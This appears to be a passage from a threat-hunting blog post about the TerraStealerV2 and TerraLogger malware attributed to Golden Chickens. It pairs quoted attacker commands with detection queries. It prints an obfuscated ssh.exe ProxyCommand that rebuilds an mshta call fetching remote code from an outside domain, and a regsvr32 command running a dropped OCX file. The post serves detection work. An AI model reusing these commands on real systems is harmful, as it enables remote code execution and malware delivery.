123. Hunting for Golden Chickens' New Malware

Hello everyone! Insikt Group uncovered two new malware families: TerraStealerV2 and TerraLogger. Both were attributed to the threat actor known as Golden Chickens. The adversary operates a Malware-as-a-Service (MaaS) platform, providing its tools to other criminals. I've looked through the report and (as always) caught a few detection and hunting opportunities.

For example, the adversary abused ssh.exe to proxy PowerShell execution:

    ssh.exe" -o ProxyCommand="powershell powershell ('datashieldsecure.com nikbfgppdkfjsfj msh ta run.mp4 http:'|Convert-String -E '1 2 3 4 5 6=34 6//1/2/5')"

We can hunt for similar activity using the following query:

    event_type: "processcreatewin" AND proc_file_name: "ssh.exe" AND cmdline: "proxycommand"

Next, the abuse of regsvr32.exe to execute a malicious OCX file:

    regsvr32.exe /s /i C:\Users\[redacted]\AppData\Local\Temp\2549828850.ocx

We can use the following query to hunt for OCX...